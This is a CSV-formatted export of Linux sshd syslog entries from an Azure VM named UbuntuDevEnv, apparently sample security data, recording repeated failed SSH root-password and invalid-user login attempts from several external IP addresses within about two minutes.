+9908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:49:57,UbuntuDevEnv,2019-06-25 22:49:57,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 44232:11: Bye Bye [preauth],50367,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,44232,,
+9909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:01,UbuntuDevEnv,2019-06-25 22:50:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:03,UbuntuDevEnv,2019-06-25 22:50:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 19299 ssh2,50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19299,,
+9911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:14,UbuntuDevEnv,2019-06-25 22:50:12,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.175 port 19299 ssh2],50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19299,,
+9912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:15,UbuntuDevEnv,2019-06-25 22:50:14,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 19299 ssh2,50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19299,,
+9913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:17,UbuntuDevEnv,2019-06-25 22:50:17,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 19299: Too many authentication failures [preauth],50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,19299,,
+9914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:17,UbuntuDevEnv,2019-06-25 22:50:17,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 19299 ssh2,50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19299,,
+9915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:17,UbuntuDevEnv,2019-06-25 22:50:17,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:17,UbuntuDevEnv,2019-06-25 22:50:17,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 19299 ssh2 [preauth],50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19299,,
+9917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:17,UbuntuDevEnv,2019-06-25 22:50:17,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50377,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:25,UbuntuDevEnv,2019-06-25 22:50:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:26,UbuntuDevEnv,2019-06-25 22:50:26,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34246 ssh2,50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34246,,
+9920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:34,UbuntuDevEnv,2019-06-25 22:50:33,auth,UbuntuDevEnv,info,Invalid user phyto2 from 77.232.128.87 port 57691,50510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,phyto2,77.232.128.8,57691,,
+9921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:34,UbuntuDevEnv,2019-06-25 22:50:32,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 34246 ssh2],50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34246,,
+9922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:34,UbuntuDevEnv,2019-06-25 22:50:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,50510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:34,UbuntuDevEnv,2019-06-25 22:50:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:36,UbuntuDevEnv,2019-06-25 22:50:35,auth,UbuntuDevEnv,info,Failed password for invalid user phyto2 from 77.232.128.87 port 57691 ssh2,50510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,phyto2,77.232.128.8,57691,,
+9925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:36,UbuntuDevEnv,2019-06-25 22:50:35,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 57691:11: Bye Bye [preauth],50510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,57691,,
+9926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:36,UbuntuDevEnv,2019-06-25 22:50:35,auth,UbuntuDevEnv,info,Disconnected from invalid user phyto2 77.232.128.87 port 57691 [preauth],50510,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,phyto2,77.232.128.8,57691,,
+9927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:36,UbuntuDevEnv,2019-06-25 22:50:35,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 34246 ssh2,50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34246,,
+9928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:41,UbuntuDevEnv,2019-06-25 22:50:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:41,UbuntuDevEnv,2019-06-25 22:50:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:41,UbuntuDevEnv,2019-06-25 22:50:41,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 34246 ssh2],50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34246,,
+9931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:41,UbuntuDevEnv,2019-06-25 22:50:41,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 34246 ssh2 [preauth],50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,34246,,
+9932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:41,UbuntuDevEnv,2019-06-25 22:50:41,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 34246: Too many authentication failures [preauth],50475,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,34246,,
+9933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:44,UbuntuDevEnv,2019-06-25 22:50:43,auth,UbuntuDevEnv,info,Invalid user yuanwd from 178.62.54.79 port 40230,50554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,178.62.54.7,40230,,
+9934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:44,UbuntuDevEnv,2019-06-25 22:50:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:44,UbuntuDevEnv,2019-06-25 22:50:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,50554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:45,UbuntuDevEnv,2019-06-25 22:50:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:45,UbuntuDevEnv,2019-06-25 22:50:45,auth,UbuntuDevEnv,info,Failed password for invalid user yuanwd from 178.62.54.79 port 40230 ssh2,50554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,178.62.54.7,40230,,
+9938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:45,UbuntuDevEnv,2019-06-25 22:50:45,auth,UbuntuDevEnv,info,Disconnected from invalid user yuanwd 178.62.54.79 port 40230 [preauth],50554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,178.62.54.7,40230,,
+9939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:45,UbuntuDevEnv,2019-06-25 22:50:45,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 40230:11: Bye Bye [preauth],50554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,40230,,
+9940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:50:47,UbuntuDevEnv,2019-06-25 22:50:46,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 48329 ssh2,50550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,48329,,
+9941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:00,UbuntuDevEnv,2019-06-25 22:51:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:00,UbuntuDevEnv,2019-06-25 22:51:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 48329: Too many authentication failures [preauth],50550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,48329,,
+9943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:00,UbuntuDevEnv,2019-06-25 22:51:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 48329 ssh2 [preauth],50550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,48329,,
+9944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:00,UbuntuDevEnv,2019-06-25 22:51:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:00,UbuntuDevEnv,2019-06-25 22:51:00,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 48329 ssh2],50550,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,48329,,
+9946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:03,UbuntuDevEnv,2019-06-25 22:51:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:05,UbuntuDevEnv,2019-06-25 22:51:05,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59885 ssh2,50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59885,,
+9948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:14,UbuntuDevEnv,2019-06-25 22:51:11,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 59885 ssh2],50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59885,,
+9949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:14,UbuntuDevEnv,2019-06-25 22:51:14,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59885 ssh2,50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59885,,
+9950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:19,UbuntuDevEnv,2019-06-25 22:51:17,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59885 ssh2,50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59885,,
+9951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:19,UbuntuDevEnv,2019-06-25 22:51:18,auth,UbuntuDevEnv,info,Invalid user oracle from 139.199.113.140 port 42616,50677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,139.199.113.1,42616,,
+9952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:19,UbuntuDevEnv,2019-06-25 22:51:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,50677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+9953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:19,UbuntuDevEnv,2019-06-25 22:51:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,50677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:20,UbuntuDevEnv,2019-06-25 22:51:19,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 59885 ssh2,50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59885,,
+9955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:20,UbuntuDevEnv,2019-06-25 22:51:19,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:20,UbuntuDevEnv,2019-06-25 22:51:19,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 59885: Too many authentication failures [preauth],50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,59885,,
+9957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:20,UbuntuDevEnv,2019-06-25 22:51:19,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 59885 ssh2 [preauth],50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,59885,,
+9958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:20,UbuntuDevEnv,2019-06-25 22:51:19,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50617,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:21,UbuntuDevEnv,2019-06-25 22:51:20,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 139.199.113.140 port 42616 ssh2,50677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,139.199.113.1,42616,,
+9960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:21,UbuntuDevEnv,2019-06-25 22:51:21,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 139.199.113.140 port 42616 [preauth],50677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,139.199.113.1,42616,,
+9961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:21,UbuntuDevEnv,2019-06-25 22:51:21,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 42616:11: Bye Bye [preauth],50677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,42616,,
+9962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:23,UbuntuDevEnv,2019-06-25 22:51:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:25,UbuntuDevEnv,2019-06-25 22:51:24,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 7081 ssh2,50691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,7081,,
+9964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:41,UbuntuDevEnv,2019-06-25 22:51:41,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 7081 ssh2],50691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,7081,,
+9965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:41,UbuntuDevEnv,2019-06-25 22:51:41,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,50691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:51:41,UbuntuDevEnv,2019-06-25 22:51:41,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,50691,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
